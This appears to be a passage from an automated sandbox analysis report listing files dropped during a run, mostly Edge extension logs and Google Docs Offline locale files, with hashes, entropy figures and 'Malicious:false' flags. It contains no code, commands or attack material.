                                                                                                                                                                                                                                                                                                  SHA1:06AD28E52C9F7E09D0FD264C42A03C779AAAAA03
                                                                                                                                                                                                                                                                                                  SHA-256:64263C0CE8DB87F1CCEA789D3FD14ABBC170E2F787E2FF5EDA987BD53101233B
                                                                                                                                                                                                                                                                                                  SHA-512:A652AF0BAECC03B2CF5D8098A59CF55DA35111C8B70A8B5788FD7D005D4AB612BF43C81AB7D10FF3898A917A00948C4700CFF93D7E72227BA6583C9118C7B69A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120832
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.328059435722378
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDy:Y5vPeDkjGgQaE/loUDy
                                                                                                                                                                                                                                                                                                  MD5:E88A09FD9D9939BB263A692F5C2AC5BF
                                                                                                                                                                                                                                                                                                  SHA1:50AFE54C82C2754A011B6002FC42060686E22055
                                                                                                                                                                                                                                                                                                  SHA-256:B896CA8A3F7D9EF0D96B8193BFA66EDBAE86BBA71AE05123E50BFE858CD02F66
                                                                                                                                                                                                                                                                                                  SHA-512:089F5F5406DF18921865C385F52C3BF3750F6E0B479B47B3E4B7BE68362EA0AF963002221BD872C890F058896D8CD2C71B6A89E14047C6928AEF5271E3FED4C2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2110
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4074890274985
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr3:8e2Fa116uCntc5toYe15M
                                                                                                                                                                                                                                                                                                  MD5:6678414A6140AF75D1206F65959BF1EE
                                                                                                                                                                                                                                                                                                  SHA1:53D55C411AF660BD1114600494BC89A7544A8BFB
                                                                                                                                                                                                                                                                                                  SHA-256:CDF8781DE0CA18CB25CDCCCFBEBEF1A72497624F5F88A930CEBB673B4C798919
                                                                                                                                                                                                                                                                                                  SHA-512:330091B796407146356236367EE9F702A0AB778E1BA4A8377F70CCDCF99BB4904A4804DF88611029ABA67940DE8C919E165C09876E9F98AE9351707EED84CB64
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
